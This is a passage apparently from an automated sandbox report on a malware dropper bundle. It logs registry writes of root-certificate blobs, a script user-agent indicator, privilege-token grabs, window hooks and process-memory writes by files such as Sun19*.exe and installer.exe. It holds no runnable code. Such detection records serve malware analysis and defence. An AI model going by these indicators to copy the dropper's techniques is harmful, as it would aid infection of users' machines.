fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 2.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Sun19262b9e49ad.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a Sun19de8ff4b6aefeb8.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a Sun19de8ff4b6aefeb8.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 Sun19262b9e49ad.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Sun19262b9e49ad.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sun1917b8fb5f09db8.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Sun19262b9e49ad.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 405 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: CmdExeWriteProcessMemorySpam 5 IoCs
pid Process 1308 GcleanerEU.exe 3100 installer.exe 3160 anyname.exe 2344 gcleaner.exe 3180 autosubplayer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 764 powershell.exe 2280 16825021799.exe 2196 Chrome 5.exe 1848 WerFault.exe 1848 WerFault.exe 1848 WerFault.exe 1848 WerFault.exe 1848 WerFault.exe 1848 WerFault.exe 1848 WerFault.exe 1848 WerFault.exe 1848 WerFault.exe 968 WerFault.exe 968 WerFault.exe 968 WerFault.exe 968 WerFault.exe 968 WerFault.exe 968 WerFault.exe 968 WerFault.exe 968 WerFault.exe 968 WerFault.exe 1772 Sun195a1614ec24e6a.exe 1320 services64.exe 2280 16825021799.exe 2308 ultramediaburner.tmp 2308 ultramediaburner.tmp 2280 16825021799.exe 2508 udptest.exe 2500 apinesp.exe 3108 explorer.exe 3108 explorer.exe 3108 explorer.exe 3108 explorer.exe 3108 explorer.exe 3108 explorer.exe 3108 explorer.exe 3108 explorer.exe 3108 explorer.exe 3108 explorer.exe 3108 explorer.exe 3108 explorer.exe 2820 59768322479.exe 2820 59768322479.exe 3108 explorer.exe 3108 explorer.exe 3108 explorer.exe 3108 explorer.exe 3108 explorer.exe 3108 explorer.exe 3108 explorer.exe 3108 explorer.exe 3108 explorer.exe 3108 explorer.exe 3108 explorer.exe 3108 explorer.exe 3108 explorer.exe 3108 explorer.exe 3108 explorer.exe 3108 explorer.exe 3108 explorer.exe 3108 explorer.exe 3108 explorer.exe 3108 explorer.exe 3108 explorer.exe -
Suspicious behavior: GetForegroundWindowSpam 6 IoCs
pid Process 3036 setup_2.tmp 1848 WerFault.exe 968 WerFault.exe 3564 WerFault.exe 1196 Process not Found 4060 iexplore.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1824 Sun1908b94df837b3158.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1696 Sun191101c1aaa.exe Token: SeDebugPrivilege 1160 Sun19e4ade31b2a.exe Token: SeCreateTokenPrivilege 1832 Sun19262b9e49ad.exe Token: SeAssignPrimaryTokenPrivilege 1832 Sun19262b9e49ad.exe Token: SeLockMemoryPrivilege 1832 Sun19262b9e49ad.exe Token: SeIncreaseQuotaPrivilege 1832 Sun19262b9e49ad.exe Token: SeMachineAccountPrivilege 1832 Sun19262b9e49ad.exe Token: SeTcbPrivilege 1832 Sun19262b9e49ad.exe Token: SeSecurityPrivilege 1832 Sun19262b9e49ad.exe Token: SeTakeOwnershipPrivilege 1832 Sun19262b9e49ad.exe Token: SeLoadDriverPrivilege 1832 Sun19262b9e49ad.exe Token: SeSystemProfilePrivilege 1832 Sun19262b9e49ad.exe Token: SeSystemtimePrivilege 1832 Sun19262b9e49ad.exe Token: SeProfSingleProcessPrivilege 1832 Sun19262b9e49ad.exe Token: SeIncBasePriorityPrivilege 1832 Sun19262b9e49ad.exe Token: SeCreatePagefilePrivilege 1832 Sun19262b9e49ad.exe Token: SeCreatePermanentPrivilege 1832 Sun19262b9e49ad.exe Token: SeBackupPrivilege 1832 Sun19262b9e49ad.exe Token: SeRestorePrivilege 1832 Sun19262b9e49ad.exe Token: SeShutdownPrivilege 1832 Sun19262b9e49ad.exe Token: SeDebugPrivilege 1832 Sun19262b9e49ad.exe Token: SeAuditPrivilege 1832 Sun19262b9e49ad.exe Token: SeSystemEnvironmentPrivilege 1832 Sun19262b9e49ad.exe Token: SeChangeNotifyPrivilege 1832 Sun19262b9e49ad.exe Token: SeRemoteShutdownPrivilege 1832 Sun19262b9e49ad.exe Token: SeUndockPrivilege 1832 Sun19262b9e49ad.exe Token: SeSyncAgentPrivilege 1832 Sun19262b9e49ad.exe Token: SeEnableDelegationPrivilege 1832 Sun19262b9e49ad.exe Token: SeManageVolumePrivilege 1832 Sun19262b9e49ad.exe Token: SeImpersonatePrivilege 1832 Sun19262b9e49ad.exe Token: SeCreateGlobalPrivilege 1832 Sun19262b9e49ad.exe Token: 31 1832 Sun19262b9e49ad.exe Token: 32 1832 Sun19262b9e49ad.exe Token: 33 1832 Sun19262b9e49ad.exe Token: 34 1832 Sun19262b9e49ad.exe Token: 35 1832 Sun19262b9e49ad.exe Token: SeDebugPrivilege 764 powershell.exe Token: SeDebugPrivilege 1772 Sun195a1614ec24e6a.exe Token: SeDebugPrivilege 2252 PublicDwlBrowser1100.exe Token: SeDebugPrivilege 2288 2.exe Token: SeDebugPrivilege 2536 5.exe Token: SeDebugPrivilege 2900 BearVpn 3.exe Token: SeDebugPrivilege 2280 16825021799.exe Token: SeDebugPrivilege 2508 udptest.exe Token: SeDebugPrivilege 2196 Chrome 5.exe Token: SeDebugPrivilege 2324 taskkill.exe Token: SeDebugPrivilege 2476 taskkill.exe Token: SeDebugPrivilege 1712 Sun198361825f4.exe Token: SeDebugPrivilege 2500 apinesp.exe Token: SeDebugPrivilege 1848 WerFault.exe Token: SeDebugPrivilege 968 WerFault.exe Token: SeDebugPrivilege 2612 LivelyScreenRecF18.exe Token: SeDebugPrivilege 1320 services64.exe Token: SeLockMemoryPrivilege 3108 explorer.exe Token: SeLockMemoryPrivilege 3108 explorer.exe Token: SeDebugPrivilege 3552 taskkill.exe Token: SeDebugPrivilege 3532 Garbage Cleaner.exe Token: SeDebugPrivilege 2820 59768322479.exe Token: SeDebugPrivilege 3068 apinesp.exe Token: SeDebugPrivilege 2220 SHelylaewesy.exe Token: SeDebugPrivilege 3740 Garbage Cleaner.exe Token: SeDebugPrivilege 3244 taskkill.exe Token: SeDebugPrivilege 3228 powershell.exe Token: SeDebugPrivilege 1644 taskkill.exe -
Suspicious use of FindShellTrayWindow 18 IoCs
pid Process 2308 ultramediaburner.tmp 4060 iexplore.exe 3100 installer.exe 1196 Process not Found 1196 Process not Found 4060 iexplore.exe 1196 Process not Found 1196 Process not Found 1980 iexplore.exe 1196 Process not Found 1196 Process not Found 4060 iexplore.exe 3200 iexplore.exe 1196 Process not Found 1196 Process not Found 4060 iexplore.exe 1196 Process not Found 1196 Process not Found -
Suspicious use of SetWindowsHookEx 34 IoCs
pid Process 4060 iexplore.exe 4060 iexplore.exe 3252 IEXPLORE.EXE 3252 IEXPLORE.EXE 3252 IEXPLORE.EXE 3252 IEXPLORE.EXE 4060 iexplore.exe 4060 iexplore.exe 2184 IEXPLORE.EXE 2184 IEXPLORE.EXE 1980 iexplore.exe 1980 iexplore.exe 2184 IEXPLORE.EXE 2184 IEXPLORE.EXE 2256 IEXPLORE.EXE 2256 IEXPLORE.EXE 4060 iexplore.exe 4060 iexplore.exe 3200 iexplore.exe 3200 iexplore.exe 2128 IEXPLORE.EXE 2128 IEXPLORE.EXE 2128 IEXPLORE.EXE 2128 IEXPLORE.EXE 3048 IEXPLORE.EXE 3048 IEXPLORE.EXE 3048 IEXPLORE.EXE 3048 IEXPLORE.EXE 4060 iexplore.exe 4060 iexplore.exe 3252 IEXPLORE.EXE 3252 IEXPLORE.EXE 3252 IEXPLORE.EXE 3252 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1100 wrote to memory of 1296 1100 setup_x86_x64_install.exe 25 PID 1100 wrote to memory of 1296 1100 setup_x86_x64_install.exe 25 PID 1100 wrote to memory of 1296 1100 setup_x86_x64_install.exe 25 PID 1100 wrote to memory of 1296 1100 setup_x86_x64_install.exe 25 PID 1100 wrote to memory of 1296 1100 setup_x86_x64_install.exe 25 PID 1100 wrote to memory of 1296 1100 setup_x86_x64_install.exe 25 PID 1100 wrote to memory of 1296 1100 setup_x86_x64_install.exe 25 PID 1296 wrote to memory of 1864 1296 setup_installer.exe 27 PID 1296 wrote to memory of 1864 1296 setup_installer.exe 27 PID 1296 wrote to memory of 1864 1296 setup_installer.exe 27 PID 1296 wrote to memory of 1864 1296 setup_installer.exe 27 PID 1296 wrote to memory of 1864 1296 setup_installer.exe 27 PID 1296 wrote to memory of 1864 1296 setup_installer.exe 27 PID 1296 wrote to memory of 1864 1296 setup_installer.exe 27 PID 1864 wrote to memory of 360 1864 setup_install.exe 31 PID 1864 wrote to memory of 360 1864 setup_install.exe 31 PID 1864 wrote to 